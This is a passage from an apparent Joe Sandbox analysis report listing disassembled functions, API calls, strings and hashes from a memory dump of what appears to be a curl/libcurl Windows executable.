                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: strtok$__acrt_iob_funcfclosefopenfree
                                    • String ID: Pl$p
                                    • API String ID: 896044852-1114704627
                                    • Opcode ID: b6363d7a8d853c546ab4eeffd5440469978889a1e5ffa9b824ec1a0081fc9f24
                                    • Instruction ID: 0f152b5f0d385dfefcec0dfca3c287ba9702cf7e292fc77782f3abe1c6fed807
                                    • Opcode Fuzzy Hash: b6363d7a8d853c546ab4eeffd5440469978889a1e5ffa9b824ec1a0081fc9f24
                                    • Instruction Fuzzy Hash: 9131E431A0C7429FC7188B2488986A77BE1BB95318F64AC1DF0D6B32C1EB70E885C721
                                    APIs
                                    • ___from_strstr_to_strchr.LIBCMT ref: 00E07BFD
                                      • Part of subcall function 00E109FA: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?), ref: 00E10A07
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00E07C56
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00E07CB1
                                    • _strdup.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 00E07CC1
                                    Strings
                                    • Invalid character is found in given range. A specified range MUST have only digits in 'start'-'stop'. The server's response to this request is uncertain., xrefs: 00E07C99
                                    • %I64d-, xrefs: 00E07C40
                                    • A specified range MUST include at least one dash (-). Appending one for you!, xrefs: 00E07C26
                                    • unsupported range point, xrefs: 00E08216
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: free$___from_strstr_to_strchr_errno_strdup
                                    • String ID: %I64d-$A specified range MUST include at least one dash (-). Appending one for you!$Invalid character is found in given range. A specified range MUST have only digits in 'start'-'stop'. The server's response to this request is uncertain.$unsupported range point
                                    • API String ID: 4096323884-1864133270
                                    • Opcode ID: 401381f160f06e92d36800f28f47f578f038fdc081867401d3e4ce394de48398
                                    • Instruction ID: 5428d38db54328b9eeea4f29e4d2e43ecad6f1abcdb295e1c7988c844f690dcd
                                    • Opcode Fuzzy Hash: 401381f160f06e92d36800f28f47f578f038fdc081867401d3e4ce394de48398
                                    • Instruction Fuzzy Hash: 7121B77170C3019EE6249B309D86BBBB7E59F98305F142C0EF5D6B61C2DE71E8C89621
                                    APIs
                                    • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 00E03B75
                                    • fread.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,?,00000000), ref: 00E03B83
                                    • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 00E03B8C
                                    • ferror.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 00E03B96
                                    • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00E03BA6
                                    • strerror.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000), ref: 00E03BAE
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: __acrt_iob_func$_errnoferrorfreadstrerror
                                    • String ID: 0kv@qv@/lv$stdin: %s
                                    • API String ID: 2463866935-3803571333
                                    • Opcode ID: f354f8f66b01d11af7213729fda5f8baa3dc215fab2715c06007ca067f0484f7
                                    • Instruction ID: 92a6f1045a2a277c90c787fd4d27ef1c742c9c4ea43827d70443e87cb2821cd5
                                    • Opcode Fuzzy Hash: f354f8f66b01d11af7213729fda5f8baa3dc215fab2715c06007ca067f0484f7
                                    • Instruction Fuzzy Hash: E321AD32600B419FCB208F3ADC84866B7FDFB4476A754282EE946A2991D770EE848E54
                                    APIs
                                    • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00E1A1AB
                                    • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00E1A1B3
                                      • Part of subcall function 00E1A01F: FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00001200,00000000,00000000,00000000,?,00000100,00000000,00000000,00000000), ref: 00E1A058
                                      • Part of subcall function 00E1A01F: wcstombs.API-MS-WIN-CRT-CONVERT-L1-1-0(?,?,?), ref: 00E1A06F
                                      • Part of subcall function 00E1A01F: ___from_strstr_to_strchr.LIBCMT ref: 00E1A087
                                    • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00E1A1E9
                                    • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00E1A1F6
                                    • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00E1A1FE
                                    • SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000), ref: 00E1A209
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: ErrorLast_errno$FormatMessage___from_strstr_to_strchrwcstombs
                                    • String ID: 0kv@qv@/lv$Unknown error %u (0x%08X)
                                    • API String ID: 1622130791-1991110101
                                    • Opcode ID: 1fbcf7b5a131de120224755548e1671a31702ce761f12215c8b24229f88e28ba
                                    • Instruction ID: da9b2b3d3a38330abcecff10b41cc245e78b40eb0f99ba06f04ba07ac5423331
                                    • Opcode Fuzzy Hash: 1fbcf7b5a131de120224755548e1671a31702ce761f12215c8b24229f88e28ba
                                    • Instruction Fuzzy Hash: 6CF0F472301F00BFC3152B7A9C08AAEBBE8DF89752F141865F101F7260EAF09C40CA61
                                    APIs
                                    • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000,00000000,?,00E02BF3), ref: 00E02A4D
                                    Strings
                                    • %s resides on a read-only file system., xrefs: 00E02A86
                                    • The directory name %s is too long., xrefs: 00E02A7F
                                    • 0kv@qv@/lv, xrefs: 00E02A4D
                                    • No space left on the file system that will contain the directory %s., xrefs: 00E02A8D, 00E02A9A
                                    • Cannot create directory %s because you exceeded your quota., xrefs: 00E02A78
                                    • You don't have permission to create %s., xrefs: 00E02A94
                                    • Error creating directory %s., xrefs: 00E02A71
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: _errno
                                    • String ID: %s resides on a read-only file system.$0kv@qv@/lv$Cannot create directory %s because you exceeded your quota.$Error creating directory %s.$No space left on the file system that will contain the directory %s.$The directory name %s is too long.$You don't have permission to create %s.
                                    • API String ID: 2918714741-4254254042
                                    • Opcode ID: f379f3081695983589889a9a565699e643bc8064f1d788f675eb7501a5b2fbf5
                                    • Instruction ID: 97e500398a1ba414e61b43ec95816cca431abbc921bb2b380e9314717d4df50f
                                    • Opcode Fuzzy Hash: f379f3081695983589889a9a565699e643bc8064f1d788f675eb7501a5b2fbf5
                                    • Instruction Fuzzy Hash: E6F082A6308003A6C63845BF790D4B316F4D7C13577143B2FBA45F6AB4DC04CCA96212
                                    APIs
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,00E30B5D,?,?,00000001), ref: 00E40E63
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00000000,?,?,?,00E30B5D,?,?,00000001), ref: 00E40ECE
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,00000000,?,?,?,00E30B5D,?,?,00000001), ref: 00E40F09
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,00000000,?,?,?,00E30B5D,?,?,00000001), ref: 00E40F86
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,?,?,?,00E30B5D,?,?,00000001), ref: 00E40FC1
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: free
                                    • String ID: %sAuthorization: NTLM %s$HTTP$Proxy-$y
                                    • API String ID: 1294909896-246124813
                                    APIs
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?), ref: 00E0F58A
                                    Strings
                                    Similarity
                                    • API ID: free
                                    • String ID: %ldL$%s set to a %s$(curl_off_t)%I64d$blobpointer$curl_easy_setopt(hnd, %s, "%s");$curl_easy_setopt(hnd, %s, %s);$functionpointer$objectpointer
                                    • API String ID: 1294909896-2831394677
                                    APIs
                                    • _strdup.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00000000,HTTP,?,?), ref: 00E34F12
                                    • _mbschr.API-MS-WIN-CRT-MULTIBYTE-L1-1-0(00000000,0000005C,?,?,00000000,HTTP,?,?), ref: 00E34F25
                                    • _mbschr.API-MS-WIN-CRT-MULTIBYTE-L1-1-0(00000000,0000002F), ref: 00E34F34
                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E34F9C
                                    • _mbsnbcpy.API-MS-WIN-CRT-MULTIBYTE-L1-1-0(00000000,?,?), ref: 00E34FAC
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 00E34FC0
                                    • _strdup.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 00E34FC9
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 00E35000
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 00E35013
                                    Similarity
                                    • API ID: free$_mbschr_strdup$_mbsnbcpymalloc
                                    • String ID:
                                    • API String ID: 103568399-0
                                    Strings
                                    • Failed to connect to %s port %u after %I64d ms: %s, xrefs: 00E1ED2B
                                    • After %I64dms connect time, move on!, xrefs: 00E1E98C
                                    • Connection timeout after %ld ms, xrefs: 00E1EC51
                                    • L', xrefs: 00E1E99A
                                    • connect to %s port %u failed: %s, xrefs: 00E1EAB2
                                    Similarity
                                    • API ID:
                                    • String ID: After %I64dms connect time, move on!$Connection timeout after %ld ms$Failed to connect to %s port %u after %I64d ms: %s$L'$connect to %s port %u failed: %s
                                    • API String ID: 0-861291074
                                    APIs
                                    • ___from_strstr_to_strchr.LIBCMT ref: 00E40503
                                    • _fstat64.API-MS-WIN-CRT-FILESYSTEM-L1-1-0(?,?), ref: 00E405B7
                                    • _close.API-MS-WIN-CRT-STDIO-L1-1-0(?), ref: 00E405C6
                                    • _write.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?), ref: 00E40673
                                    • _close.API-MS-WIN-CRT-STDIO-L1-1-0(?), ref: 00E406EE
                                    Strings
                                    • Can't get the size of %s, xrefs: 00E405CE
                                    • Can't open %s for writing, xrefs: 00E40565
                                    Similarity
                                    • API ID: _close$___from_strstr_to_strchr_fstat64_write
                                    • String ID: Can't get the size of %s$Can't open %s for writing
                                    • API String ID: 2085843339-3544860555
                                    APIs
                                    • _ValidateLocalCookies.LIBCMT ref: 00E51E77
                                    • ___except_validate_context_record.LIBVCRUNTIME ref: 00E51E7F
                                    • _ValidateLocalCookies.LIBCMT ref: 00E51F08
                                    • __IsNonwritableInCurrentImage.LIBCMT ref: 00E51F33
                                    • _ValidateLocalCookies.LIBCMT ref: 00E51F88
                                    Strings
                                    Similarity
                                    • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                    • String ID: csm$csm
                                    • API String ID: 1170836740-3733052814
                                    Strings
                                    • # Your HSTS cache. https://curl.se/docs/hsts.html# This file was generated by libcurl! Edit at your own risk., xrefs: 00E265B9
                                    • %s.%s.tmp, xrefs: 00E26583
                                    Similarity
                                    • API ID:
                                    • String ID: # Your HSTS cache. https://curl.se/docs/hsts.html# This file was generated by libcurl! Edit at your own risk.$%s.%s.tmp
                                    • API String ID: 0-2507297550
                                    APIs
                                    • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000001), ref: 00E0347F
                                    • fopen.API-MS-WIN-CRT-STDIO-L1-1-0(?,00E56C58), ref: 00E0348D
                                    • fclose.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 00E035C2
                                    Strings
                                    Similarity
                                    • API ID: __acrt_iob_funcfclosefopen
                                    • String ID: %s$%s$Failed to open %s to write libcurl code!$pv
                                    • API String ID: 4110152555-95071132
                                    APIs
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E213E6
                                    • ___from_strstr_to_strchr.LIBCMT ref: 00E2142F
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00E2149A
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00E214DD
                                    Strings
                                    Similarity
                                    • API ID: free$___from_strstr_to_strchr
                                    • String ID: %.*s$%sAuthorization: Digest %s$Proxy-
                                    • API String ID: 622630536-541442569
                                    APIs
                                    • strpbrk.API-MS-WIN-CRT-STRING-L1-1-0(?,00E58C2C), ref: 00E0505C
                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00E05070
                                    • strcspn.API-MS-WIN-CRT-STRING-L1-1-0(?,00E58C2C), ref: 00E05097
                                    • strncpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,00000000,?,00E58C2C), ref: 00E050A2
                                    • _strdup.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00E0512B
                                    • _strdup.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00E0513C
                                    Strings
                                    Similarity
                                    • API ID: _strdup$mallocstrcspnstrncpystrpbrk
                                    • String ID: pkcs11:
                                    • API String ID: 1722728043-2446828420
                                    APIs
                                    • htons.WS2_32(?), ref: 00E3F47D
                                    • htons.WS2_32(?), ref: 00E3F491
                                    • send.WS2_32(?,?,00000003,00000000), ref: 00E3F51A
                                    • WSAGetLastError.WS2_32(?,00000001), ref: 00E3F524
                                    • send.WS2_32(?,?,00000002,00000000), ref: 00E3F55A
                                    • WSAGetLastError.WS2_32(?,00000001), ref: 00E3F564
                                    Strings
                                    Similarity
                                    • API ID: ErrorLasthtonssend
                                    • String ID: Sending data failed (%d)
                                    • API String ID: 2027122571-2319402659
                                    APIs
                                      • Part of subcall function 00E03857: __stdio_common_vsscanf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,000000FF,?,00000000,?), ref: 00E03872
                                    • ___from_strstr_to_strchr.LIBCMT ref: 00E15198
                                    • strtol.API-MS-WIN-CRT-CONVERT-L1-1-0(?,?,0000000A,?,00000000,00000000,?,?,?,?,?,?,00E15B5D,00000000), ref: 00E151D4
                                    Strings
                                    Similarity
                                    • API ID: ___from_strstr_to_strchr__stdio_common_vsscanfstrtol
                                    • String ID: %*[^]]%c%n$%ld$[%*45[0123456789abcdefABCDEF:.]%c%n$]$][
                                    • API String ID: 1045171823-2251480945
                                    APIs
                                    • _strrchr.LIBCMT ref: 00E3B2B9
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?), ref: 00E3B2E3
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,00000000,?,?), ref: 00E3B33A
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,00000000,?,?), ref: 00E3B372
                                      • Part of subcall function 00E12813: malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E12848
                                    Strings
                                    Similarity
                                    • API ID: free$_strrchrmalloc
                                    • String ID: %s%s%s$LIST$NLST
                                    • API String ID: 685622329-959297966
                                    APIs
                                    • calloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,?,?,?,?,?,?,?,?,?,?,?,00E2EBB8,?), ref: 00E28BBF
                                    • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?,00E2EBB8,?,?), ref: 00E28C96
                                      • Part of subcall function 00E288E1: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,00E28C01,?,?,00000000), ref: 00E28928
                                      • Part of subcall function 00E288E1: InitializeCriticalSectionEx.API-MS-WIN-CORE-SYNCH-L1-1-0(00000000,00000000,00000001,00E28C01,?,?,00000000), ref: 00E28936
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,00E2EBB8,?,?,?,?), ref: 00E28C19
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,00E2EBB8,?,?,?,?), ref: 00E28C2E
                                    • _beginthreadex.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000,00000000,00E28A20,00000010,00000000,00000000,?,?,?,?,?,?,?,?,?,00E2EBB8), ref: 00E28C63
                                    Strings
                                    Similarity
                                    • API ID: free$CriticalInitializeSection_beginthreadex_errnocallocmalloc
                                    • String ID: 0kv@qv@/lv
                                    • API String ID: 1055258384-1424214619
                                    APIs
                                    Strings
                                    Similarity
                                    • API ID: _strrchr$free
                                    • String ID: %s%s$%s/%s$://
                                    • API String ID: 3904173637-3147304931
                                    APIs
                                    • getsockname.WS2_32(?,?,?), ref: 00E1E5C6
                                    • WSAGetLastError.WS2_32(?,?,?), ref: 00E1E5D0
                                      • Part of subcall function 00E1A0B8: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00E1A0C3
                                      • Part of subcall function 00E1A0B8: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00E1A0CB
                                      • Part of subcall function 00E1A0B8: __sys_nerr.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00E1A0DD
                                      • Part of subcall function 00E1A0B8: __sys_errlist.API-MS-WIN-CRT-RUNTIME-L1-1-0(000000FF), ref: 00E1A0EC
                                      • Part of subcall function 00E1A0B8: strncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000), ref: 00E1A0F6
                                      • Part of subcall function 00E1A0B8: _strrchr.LIBCMT ref: 00E1A142
                                      • Part of subcall function 00E1A0B8: _strrchr.LIBCMT ref: 00E1A15C
                                      • Part of subcall function 00E1A0B8: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00E1A173
                                      • Part of subcall function 00E1A0B8: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00E1A180
                                      • Part of subcall function 00E1A0B8: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00E1A188
                                      • Part of subcall function 00E1A0B8: SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000), ref: 00E1A193
                                    • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?), ref: 00E1E60E
                                    • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?), ref: 00E1E616
                                    Strings
                                    Similarity
                                    • API ID: _errno$ErrorLast$_strrchr$__sys_errlist__sys_nerrgetsocknamestrncpy
                                    • String ID: 0kv@qv@/lv$getsockname() failed with errno %d: %s$ssloc inet_ntop() failed with errno %d: %s
                                    • API String ID: 2515041809-2797063059
                                    APIs
                                    • ___from_strstr_to_strchr.LIBCMT ref: 00E29EDF
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E29F59
                                    Strings
                                    Similarity
                                    • API ID: ___from_strstr_to_strchrfree
                                    • String ID: %s%s%s:%d$Host$Host: %s$TQ$XQ
                                    • API String ID: 653773606-1047823213
                                    APIs
                                    • getpeername.WS2_32(?,?,?), ref: 00E1E4E6
                                    • WSAGetLastError.WS2_32 ref: 00E1E4F0
                                      • Part of subcall function 00E1A0B8: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00E1A0C3
                                      • Part of subcall function 00E1A0B8: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00E1A0CB
                                      • Part of subcall function 00E1A0B8: __sys_nerr.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00E1A0DD
                                      • Part of subcall function 00E1A0B8: __sys_errlist.API-MS-WIN-CRT-RUNTIME-L1-1-0(000000FF), ref: 00E1A0EC
                                      • Part of subcall function 00E1A0B8: strncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000), ref: 00E1A0F6
                                      • Part of subcall function 00E1A0B8: _strrchr.LIBCMT ref: 00E1A142
                                      • Part of subcall function 00E1A0B8: _strrchr.LIBCMT ref: 00E1A15C
                                      • Part of subcall function 00E1A0B8: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00E1A173
                                      • Part of subcall function 00E1A0B8: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00E1A180
                                      • Part of subcall function 00E1A0B8: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00E1A188
                                      • Part of subcall function 00E1A0B8: SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000), ref: 00E1A193
                                    • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00E1E535
                                    • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00E1E53D
                                    Strings
                                    Similarity
                                    • API ID: _errno$ErrorLast$_strrchr$__sys_errlist__sys_nerrgetpeernamestrncpy
                                    • String ID: 0kv@qv@/lv$getpeername() failed with errno %d: %s$ssrem inet_ntop() failed with errno %d: %s
                                    • API String ID: 1744225859-3435328547
                                    APIs
                                      • Part of subcall function 00E467EE: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,00E30591,00000001,00000000,00000000,00000000,?,?,?), ref: 00E46847
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00000000,?,?,00E30D79,?), ref: 00E42E88
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00000000,?,?,00E30D79,?), ref: 00E42EAD
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,?,?,00E30D79,?), ref: 00E42ECD
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E42F34
                                    Strings
                                    Similarity
                                    • API ID: free$malloc
                                    • String ID: %sAuthorization: Negotiate %s$Curl_output_negotiate, no persistent authentication: cleanup existing context$Negotiate$Proxy-
                                    • API String ID: 2190258309-1255959952
                                    APIs
                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00000000,?,?,00E01773), ref: 00E018D7
                                    • ___from_strstr_to_strchr.LIBCMT ref: 00E0190C
                                    • _strrchr.LIBCMT ref: 00E0191C
                                    • _strrchr.LIBCMT ref: 00E01931
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,00E01773), ref: 00E01944
                                    • ___from_strstr_to_strchr.LIBCMT ref: 00E01955
                                    • ___from_strstr_to_strchr.LIBCMT ref: 00E01965
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,00000000,?,?,00E01773), ref: 00E019A0
                                    Similarity
                                    • API ID: ___from_strstr_to_strchr$_strrchrfree$malloc
                                    • String ID:
                                    • API String ID: 3226260525-0
                                    APIs
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E32BB8
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E32C0A
                                    Strings
                                    Similarity
                                    • API ID: free
                                    • String ID: Content-Range$Content-Range: bytes %s%I64d/%I64d$Content-Range: bytes %s/%I64d$Content-Range: bytes 0-%I64d/%I64d$Range$Range: bytes=%s
                                    • API String ID: 1294909896-2902172602
                                    APIs
                                      • Part of subcall function 00E3480B: QueryPerformanceCounter.API-MS-WIN-CORE-PROFILE-L1-1-0(00000000,00000000,?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,00E124A8), ref: 00E34820
                                      • Part of subcall function 00E3480B: __alldvrm.LIBCMT ref: 00E34839
                                      • Part of subcall function 00E3480B: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00E34863
                                    • _strdup.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00000000,?,00000000), ref: 00E3510A
                                    • _strdup.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000,?,00000000), ref: 00E35118
                                    • Sleep.API-MS-WIN-CORE-SYNCH-L1-2-0(00000001), ref: 00E35159
                                    • MoveFileExA.API-MS-WIN-CORE-KERNEL32-LEGACY-L1-1-0(00000000,00000000,00000001(MOVEFILE_REPLACE_EXISTING),00000000,?,00000000), ref: 00E35166
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00E35175
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 00E35181
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00E351A1
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 00E351AD
                                    Similarity
                                    • API ID: free$_strdup$CounterFileMovePerformanceQuerySleepUnothrow_t@std@@@__alldvrm__ehfuncinfo$??2@
                                    • String ID:
                                    • API String ID: 1781201201-0
                                    APIs
                                      • Part of subcall function 00E3FEA6: getaddrinfo.WS2_32(?,?,?,?), ref: 00E3FEC0
                                      • Part of subcall function 00E3FEA6: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?), ref: 00E3FF44
                                    • WSAGetLastError.WS2_32 ref: 00E28A68
                                    • WSAGetLastError.WS2_32 ref: 00E28A72
                                    • EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?), ref: 00E28A87
                                    • LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?), ref: 00E28A95
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E28AB1
                                    • send.WS2_32(000000FF,?,00000001,00000000), ref: 00E28ACC
                                    • WSAGetLastError.WS2_32 ref: 00E28AD6
                                    • LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?), ref: 00E28AE4
                                    Similarity
                                    • API ID: CriticalErrorLastSection$Leave$Enterfreegetaddrinfomallocsend
                                    • String ID:
                                    • API String ID: 2368937457-0
                                    APIs
                                    • _set_app_type.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000001), ref: 00E51113
                                    • _set_fmode.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,00000001), ref: 00E5111E
                                    • __p__commode.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,00000001), ref: 00E5112A
                                    • __RTC_Initialize.LIBCMT ref: 00E51142
                                    • _configure_narrow_argv.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000,00E518B0), ref: 00E51157
                                      • Part of subcall function 00E51813: InitializeSListHead.KERNEL32(00E6F430,00E51167), ref: 00E51818
                                    • __setusermatherr.API-MS-WIN-CRT-MATH-L1-1-0(Function_00027BE0), ref: 00E51175
